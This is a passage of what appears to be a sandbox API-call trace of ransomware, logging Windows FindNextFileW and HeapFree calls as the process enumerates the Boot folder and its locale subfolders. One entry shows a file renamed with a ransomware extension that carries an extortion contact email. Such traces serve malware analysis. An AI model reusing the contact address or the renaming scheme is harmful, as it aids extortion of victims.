ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfed69f3e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="HEADER~1.BAT")) returned 1 [0178.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.357] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0178.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.359] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0178.359] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.359] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0178.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.360] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0178.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.360] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0178.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.360] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0178.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.361] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.361] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.361] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0178.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.362] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0178.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.362] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0178.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.362] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0178.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.363] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0178.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.366] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0178.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.366] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0178.366] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.367] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0178.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.367] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0178.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.367] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0178.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.368] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0178.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.368] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0178.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.368] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0178.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.369] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0178.369] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.369] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0178.369] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.369] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0178.370] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.370] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0178.370] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.370] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0178.370] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.370] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0178.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.484] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0178.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.485] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0178.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.485] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.485] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0178.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.485] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0178.485] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.485] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0178.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.486] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0178.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.486] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0178.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.486] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0178.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.487] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0178.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.487] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0178.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.487] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0178.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.487] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0178.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.488] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", 